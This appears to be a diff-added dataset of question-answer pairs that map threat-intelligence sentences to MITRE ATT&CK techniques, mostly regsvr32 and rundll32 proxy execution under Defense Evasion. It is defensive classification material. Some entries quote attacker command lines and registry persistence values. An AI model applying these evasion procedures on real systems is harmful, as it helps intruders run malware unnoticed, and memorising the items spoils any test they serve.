+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ragnar Locker has been delivered as an unsigned MSI package that was executed with msiexec.exe.,"Tecnique: T1218.007 System Binary Proxy Execution: Msiexec, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RemoteUtilities can use Msiexec to install a service.,"Tecnique: T1218.007 System Binary Proxy Execution: Msiexec, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cobalt Group has used odbcconf to proxy the execution of malicious DLL files.,"Tecnique: T1218.008 System Binary Proxy Execution: Odbcconf, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bumblebee can use `odbcconf.exe` to run DLLs on targeted hosts.,"Tecnique: T1218.008 System Binary Proxy Execution: Odbcconf, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Agent Tesla has dropped RegAsm.exe onto systems for performing malicious activity.,"Tecnique: T1218.009 System Binary Proxy Execution: Regsvcs/Regasm, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0015, the threat actors employed code that used `regsvr32` for execution.","Tecnique: T1218.010 System Binary Proxy Execution: Regsvr32, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Dream Job, Lazarus Group used `regsvr32` to execute malware.","Tecnique: T1218.010 System Binary Proxy Execution: Regsvr32, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT19 used Regsvr32 to bypass application control techniques.,"Tecnique: T1218.010 System Binary Proxy Execution: Regsvr32, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT32 created a Scheduled Task/Job that used regsvr32.exe to execute a COM scriptlet that dynamically downloaded a backdoor and injected it into memory. The group has also used regsvr32 to run their backdoor.,"Tecnique: T1218.010 System Binary Proxy Execution: Regsvr32, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Blue Mockingbird has executed custom-compiled XMRIG miner DLLs using regsvr32.exe.,"Tecnique: T1218.010 System Binary Proxy Execution: Regsvr32, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cobalt Group has used regsvr32.exe to execute scripts.,"Tecnique: T1218.010 System Binary Proxy Execution: Regsvr32, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Deep Panda has used regsvr32.exe to execute a server variant of Derusbi in victim networks.,"Tecnique: T1218.010 System Binary Proxy Execution: Regsvr32, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Inception has ensured persistence at system boot by setting the value regsvr32 %path%\ctfmonrn.dll /s.,"Tecnique: T1218.010 System Binary Proxy Execution: Regsvr32, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kimsuky has executed malware with regsvr32s.,"Tecnique: T1218.010 System Binary Proxy Execution: Regsvr32, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Leviathan has used regsvr32 for execution.,"Tecnique: T1218.010 System Binary Proxy Execution: Regsvr32, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TA551 has used regsvr32.exe to load malicious DLLs.,"Tecnique: T1218.010 System Binary Proxy Execution: Regsvr32, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WIRTE has used `regsvr32.exe` to trigger the execution of a malicious script.,"Tecnique: T1218.010 System Binary Proxy Execution: Regsvr32, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AppleSeed can call regsvr32.exe for execution.,"Tecnique: T1218.010 System Binary Proxy Execution: Regsvr32, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Astaroth can be loaded through regsvr32.exe.,"Tecnique: T1218.010 System Binary Proxy Execution: Regsvr32, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Derusbi variants have been seen that use Registry persistence to proxy execution through regsvr32.exe.,"Tecnique: T1218.010 System Binary Proxy Execution: Regsvr32, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dridex can use `regsvr32.exe` to initiate malicious code.,"Tecnique: T1218.010 System Binary Proxy Execution: Regsvr32, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: EVILNUM can run a remote scriptlet that drops a file and executes it via regsvr32.exe.,"Tecnique: T1218.010 System Binary Proxy Execution: Regsvr32, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Egregor has used regsvr32.exe to execute malicious DLLs.,"Tecnique: T1218.010 System Binary Proxy Execution: Regsvr32, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HermeticWizard has used `regsvr32.exe /s /i` to execute malicious payloads.,"Tecnique: T1218.010 System Binary Proxy Execution: Regsvr32, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Hi-Zor executes using regsvr32.exe called from the Registry Run Keys / Startup Folder persistence mechanism.,"Tecnique: T1218.010 System Binary Proxy Execution: Regsvr32, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Koadic can use Regsvr32 to execute additional payloads.,"Tecnique: T1218.010 System Binary Proxy Execution: Regsvr32, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: More_eggs has used regsvr32.exe to execute the malicious DLL.,"Tecnique: T1218.010 System Binary Proxy Execution: Regsvr32, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mori can use `regsvr32.exe` for DLL execution.,"Tecnique: T1218.010 System Binary Proxy Execution: Regsvr32, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Some Orz versions have an embedded DLL known as MockDll that uses Process Hollowing and regsvr32 to execute another payload.,"Tecnique: T1218.010 System Binary Proxy Execution: Regsvr32, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QakBot can use Regsvr32 to execute malicious DLLs.,"Tecnique: T1218.010 System Binary Proxy Execution: Regsvr32, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ragnar Locker has used regsvr32.exe to execute components of VirtualBox.,"Tecnique: T1218.010 System Binary Proxy Execution: Regsvr32, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RogueRobin uses regsvr32.exe to run a .sct file for execution.,"Tecnique: T1218.010 System Binary Proxy Execution: Regsvr32, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Saint Bot has used `regsvr32` to execute scripts.,"Tecnique: T1218.010 System Binary Proxy Execution: Regsvr32, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Squirrelwaffle has been executed using `regsvr32.exe`.,"Tecnique: T1218.010 System Binary Proxy Execution: Regsvr32, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Valak has used regsvr32.exe to launch malicious DLLs.,"Tecnique: T1218.010 System Binary Proxy Execution: Regsvr32, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Xbash can use regsvr32 for executing scripts.,"Tecnique: T1218.010 System Binary Proxy Execution: Regsvr32, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the 2015 Ukraine Electric Power Attack, Sandworm Team used a backdoor which could execute a supplied DLL using `rundll32.exe`.","Tecnique: T1218.011 System Binary Proxy Execution: Rundll32, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0015, the threat actors loaded DLLs via `rundll32` using the `svchost` process.","Tecnique: T1218.011 System Binary Proxy Execution: Rundll32, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0018, the threat actors used `rundll32` to run Mimikatz.","Tecnique: T1218.011 System Binary Proxy Execution: Rundll32, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0021, the threat actors used `rundll32.exe` to execute the Cobalt Strike Beacon loader DLL.","Tecnique: T1218.011 System Binary Proxy Execution: Rundll32, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Dream Job, Lazarus Group executed malware with `C:\\windows\system32\rundll32.exe ""C:\ProgramData\ThumbNail\thumbnail.db""`, `CtrlPanel S-6-81-3811-75432205-060098-6872 0 0 905`.","Tecnique: T1218.011 System Binary Proxy Execution: Rundll32, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Spalax, the threat actors used `rundll32.exe` to execute malicious installers.","Tecnique: T1218.011 System Binary Proxy Execution: Rundll32, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the SolarWinds Compromise, APT29 used `Rundll32.exe` to execute payloads.","Tecnique: T1218.011 System Binary Proxy Execution: Rundll32, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT19 configured its payload to inject into the rundll32.exe.,"Tecnique: T1218.011 System Binary Proxy Execution: Rundll32, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT28 executed CHOPSTICK by using rundll32 commands such as rundll32.exe “C:\Windows\twain_64.dll”. APT28 also executed a .dll for a first stage dropper using rundll32.exe. An APT28 loader Trojan saved a batch script that uses rundll32 to execute a DLL payload.,"Tecnique: T1218.011 System Binary Proxy Execution: Rundll32, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT3 has a tool that can run DLLs.,"Tecnique: T1218.011 System Binary Proxy Execution: Rundll32, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT32 malware has used rundll32.exe to execute an initial infection process.,"Tecnique: T1218.011 System Binary Proxy Execution: Rundll32, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT38 has used rundll32.exe to execute binaries, scripts, and Control Panel Item files and to execute code via proxy to avoid triggering security tools.","Tecnique: T1218.011 System Binary Proxy Execution: Rundll32, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT41 has used rundll32.exe to execute a loader.,"Tecnique: T1218.011 System Binary Proxy Execution: Rundll32, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Blue Mockingbird has executed custom-compiled XMRIG miner DLLs using rundll32.exe.,"Tecnique: T1218.011 System Binary Proxy Execution: Rundll32, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Carbanak installs VNC server software that executes through rundll32.,"Tecnique: T1218.011 System Binary Proxy Execution: Rundll32, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CopyKittens uses rundll32 to load various tools on victims, including a lateral movement tool named Vminst, Cobalt Strike, and shellcode.","Tecnique: T1218.011 System Binary Proxy Execution: Rundll32, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN7 has used `rundll32.exe` to execute malware on a compromised network.,"Tecnique: T1218.011 System Binary Proxy Execution: Rundll32, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gamaredon Group malware has used rundll32 to launch additional malicious components.,"Tecnique: T1218.011 System Binary Proxy Execution: Rundll32, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HAFNIUM has used rundll32 to load malicious DLLs.,"Tecnique: T1218.011 System Binary Proxy Execution: Rundll32, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kimsuky has used `rundll32.exe` to execute malicious scripts and malware on a victim's network.,"Tecnique: T1218.011 System Binary Proxy Execution: Rundll32, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lazarus Group has used rundll32 to execute malicious payloads on a compromised host.,"Tecnique: T1218.011 System Binary Proxy Execution: Rundll32, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LazyScripter has used `rundll32.exe` to execute Koadic stagers.,"Tecnique: T1218.011 System Binary Proxy Execution: Rundll32, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Magic Hound has used rundll32.exe to execute MiniDump from comsvcs.dll when dumping LSASS memory.,"Tecnique: T1218.011 System Binary Proxy Execution: Rundll32, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MuddyWater has used malware that leveraged rundll32.exe in a Registry Run key to execute a .dll.,"Tecnique: T1218.011 System Binary Proxy Execution: Rundll32, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sandworm Team used a backdoor which could execute a supplied DLL using rundll32.exe.,"Tecnique: T1218.011 System Binary Proxy Execution: Rundll32, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TA505 has leveraged rundll32.exe to execute malicious DLLs.,"Tecnique: T1218.011 System Binary Proxy Execution: Rundll32, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TA551 has used rundll32.exe to load malicious DLLs.,"Tecnique: T1218.011 System Binary Proxy Execution: Rundll32, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Wizard Spider has utilized `rundll32.exe` to deploy ransomware commands with the use of WebDAV.,"Tecnique: T1218.011 System Binary Proxy Execution: Rundll32, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ADVSTORESHELL has used rundll32.exe in a Registry value to establish persistence.,"Tecnique: T1218.011 System Binary Proxy Execution: Rundll32, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Attor's installer plugin can schedule rundll32.exe to load the dispatcher.,"Tecnique: T1218.011 System Binary Proxy Execution: Rundll32, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BLINDINGCAN has used Rundll32 to load a malicious DLL.,"Tecnique: T1218.011 System Binary Proxy Execution: Rundll32, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Backdoor.Oldrea can use rundll32 for execution on compromised hosts.,"Tecnique: T1218.011 System Binary Proxy Execution: Rundll32, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bad Rabbit has used rundll32 to launch a malicious DLL as C:Windowsinfpub.dat.,"Tecnique: T1218.011 System Binary Proxy Execution: Rundll32, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bisonal has used rundll32.exe to execute as part of the Registry Run key it adds: HKEY_CURRENT_USER \Software\Microsoft\Windows\CurrentVersion\Run\”vert” = “rundll32.exe c:\windows\temp\pvcu.dll , Qszdez”.","Tecnique: T1218.011 System Binary Proxy Execution: Rundll32, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BoomBox can use RunDLL32 for execution.,"Tecnique: T1218.011 System Binary Proxy Execution: Rundll32, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Briba uses rundll32 within Registry Run Keys / Startup Folder entries to execute malicious DLLs.,"Tecnique: T1218.011 System Binary Proxy Execution: Rundll32, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bumblebee has used `rundll32` for execution of the loader component.,"Tecnique: T1218.011 System Binary Proxy Execution: Rundll32, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CORESHELL is installed via execution of rundll32 with an export named ""init"" or ""InitW.""","Tecnique: T1218.011 System Binary Proxy Execution: Rundll32, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cobalt Strike can use `rundll32.exe` to load DLL from the command line.,"Tecnique: T1218.011 System Binary Proxy Execution: Rundll32, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Comnie uses Rundll32 to load a malicious DLL.,"Tecnique: T1218.011 System Binary Proxy Execution: Rundll32, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The CozyCar dropper copies the system file rundll32.exe to the install location for the malware, then uses the copy of rundll32.exe to load and execute the main CozyCar component.","Tecnique: T1218.011 System Binary Proxy Execution: Rundll32, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DDKONG uses Rundll32 to ensure only a single instance of itself is running at once.,"Tecnique: T1218.011 System Binary Proxy Execution: Rundll32, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DEADEYE can use `rundll32.exe` for execution of living off the land binaries (lolbin) such as `SHELL32.DLL`.,"Tecnique: T1218.011 System Binary Proxy Execution: Rundll32, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: EVILNUM can execute commands and scripts through rundll32.,"Tecnique: T1218.011 System Binary Proxy Execution: Rundll32, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Egregor has used rundll32 during execution.,"Tecnique: T1218.011 System Binary Proxy Execution: Rundll32, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: After copying itself to a DLL file, a variant of Elise calls the DLL file using rundll32.exe.","Tecnique: T1218.011 System Binary Proxy Execution: Rundll32, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Variants of Emissary have used rundll32.exe in Registry values added to establish persistence.,"Tecnique: T1218.011 System Binary Proxy Execution: Rundll32, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: EnvyScout has the ability to proxy execution of malicious files with Rundll32.,"Tecnique: T1218.011 System Binary Proxy Execution: Rundll32, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FELIXROOT uses Rundll32 for executing the dropper program.,"Tecnique: T1218.011 System Binary Proxy Execution: Rundll32, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FatDuke can execute via rundll32.,"Tecnique: T1218.011 System Binary Proxy Execution: Rundll32, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Rundll32.exe is used as a way of executing Flame at the command-line.,"Tecnique: T1218.011 System Binary Proxy Execution: Rundll32, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FlawedAmmyy has used `rundll32` for execution.,"Tecnique: T1218.011 System Binary Proxy Execution: Rundll32, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FunnyDream can use `rundll32` for execution of its components.,"Tecnique: T1218.011 System Binary Proxy Execution: Rundll32, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GreyEnergy uses PsExec locally in order to execute rundll32.exe at the highest privileges (NTAUTHORITY\SYSTEM).,"Tecnique: T1218.011 System Binary Proxy Execution: Rundll32, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HermeticWizard has the ability to create a new process using `rundll32`.,"Tecnique: T1218.011 System Binary Proxy Execution: Rundll32, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Heyoka Backdoor can use rundll32.exe to gain execution.,"Tecnique: T1218.011 System Binary Proxy Execution: Rundll32, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: InvisiMole has used rundll32.exe for execution.,"Tecnique: T1218.011 System Binary Proxy Execution: Rundll32, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: JHUHUGIT is executed using rundll32.exe.,"Tecnique: T1218.011 System Binary Proxy Execution: Rundll32, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KONNI has used Rundll32 to execute its loader for privilege escalation purposes.,"Tecnique: T1218.011 System Binary Proxy Execution: Rundll32, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Koadic can use Rundll32 to execute additional payloads.,"Tecnique: T1218.011 System Binary Proxy Execution: Rundll32, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kwampirs uses rundll32.exe in a Registry value added to establish persistence.,"Tecnique: T1218.011 System Binary Proxy Execution: Rundll32, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Matryoshka uses rundll32.exe in a Registry Run key value for execution as part of its persistence mechanism.,"Tecnique: T1218.011 System Binary Proxy Execution: Rundll32, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MegaCortex has used rundll32.exe to load a DLL for file encryption.,"Tecnique: T1218.011 System Binary Proxy Execution: Rundll32, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mispadu uses RunDLL32 for execution via its injector DLL.,"Tecnique: T1218.011 System Binary Proxy Execution: Rundll32, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mongall can use `rundll32.exe` for execution.,"Tecnique: T1218.011 System Binary Proxy Execution: Rundll32, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mosquito's launcher uses rundll32.exe in a Registry Key value to start the main backdoor capability.,"Tecnique: T1218.011 System Binary Proxy Execution: Rundll32, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NOKKI has used rundll32 for execution.,"Tecnique: T1218.011 System Binary Proxy Execution: Rundll32, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NativeZone has used rundll32 to execute a malicious DLL.,"Tecnique: T1218.011 System Binary Proxy Execution: Rundll32, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ninja loader components can be executed through rundll32.exe.,"Tecnique: T1218.011 System Binary Proxy Execution: Rundll32, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NotPetya uses rundll32.exe to install itself on remote systems when accessed via PsExec or wmic.,"Tecnique: T1218.011 System Binary Proxy Execution: Rundll32, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PUNCHBUGGY can load a DLL using Rundll32.,"Tecnique: T1218.011 System Binary Proxy Execution: Rundll32, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PcShare has used `rundll32.exe` for execution.,"Tecnique: T1218.011 System Binary Proxy Execution: Rundll32, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PolyglotDuke can be executed using rundll32.exe.,"Tecnique: T1218.011 System Binary Proxy Execution: Rundll32, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PowerDuke uses rundll32.exe to load.,"Tecnique: T1218.011 System Binary Proxy Execution: Rundll32, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Prikormka uses rundll32.exe to load its DLL.,"Tecnique: T1218.011 System Binary Proxy Execution: Rundll32, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pteranodon executes functions using rundll32.exe.,"Tecnique: T1218.011 System Binary Proxy Execution: Rundll32, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QakBot has used Rundll32.exe to drop malicious DLLs including Brute Ratel C4 and to enable C2 communication.,"Tecnique: T1218.011 System Binary Proxy Execution: Rundll32, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RTM runs its core DLL file using rundll32.exe.,"Tecnique: T1218.011 System Binary Proxy Execution: Rundll32, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ragnar Locker has used rundll32.exe to execute components of VirtualBox.,"Tecnique: T1218.011 System Binary Proxy Execution: Rundll32, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SDBbot has used rundll32.exe to execute DLLs.,"Tecnique: T1218.011 System Binary Proxy Execution: Rundll32, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SUNBURST used Rundll32 to execute payloads.,"Tecnique: T1218.011 System Binary Proxy Execution: Rundll32, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SVCReady has used `rundll32.exe` for execution.,"Tecnique: T1218.011 System Binary Proxy Execution: Rundll32, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sakula calls cmd.exe to run various DLL files via rundll32.,"Tecnique: T1218.011 System Binary Proxy Execution: Rundll32, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ServHelper contains a module for downloading and executing DLLs that leverages rundll32.exe.,"Tecnique: T1218.011 System Binary Proxy Execution: Rundll32, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sibot has executed downloaded DLLs with rundll32.exe.,"Tecnique: T1218.011 System Binary Proxy Execution: Rundll32, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Squirrelwaffle has been executed using `rundll32.exe`.,"Tecnique: T1218.011 System Binary Proxy Execution: Rundll32, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: StreamEx uses rundll32 to call an exported function.,"Tecnique: T1218.011 System Binary Proxy Execution: Rundll32, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: USBferry can execute rundll32.exe in memory to avoid detection.,"Tecnique: T1218.011 System Binary Proxy Execution: Rundll32, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The Winnti for Windows installer loads a DLL using rundll32.,"Tecnique: T1218.011 System Binary Proxy Execution: Rundll32, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ZxShell has used rundll32.exe to execute other DLLs and named pipes.,"Tecnique: T1218.011 System Binary Proxy Execution: Rundll32, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: A gh0st RAT variant has used rundll32 for execution.,"Tecnique: T1218.011 System Binary Proxy Execution: Rundll32, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Hancitor has used verclsid.exe to download and execute a malicious script.,"Tecnique: T1218.012 System Binary Proxy Execution: Verclsid, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0015, the threat actors installed the AnyDesk remote desktop application onto the compromised network.","Tecnique: T1219 Remote Access Software, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0018, the threat actors used AnyDesk to transfer tools between systems.","Tecnique: T1219 Remote Access Software, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0027, Scattered Spider directed victims to run remote monitoring and management (RMM) tools.","Tecnique: T1219 Remote Access Software, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Night Dragon, threat actors used several remote administration tools as persistent infiltration channels.","Tecnique: T1219 Remote Access Software, Tactic: TA0011 Command and Control"
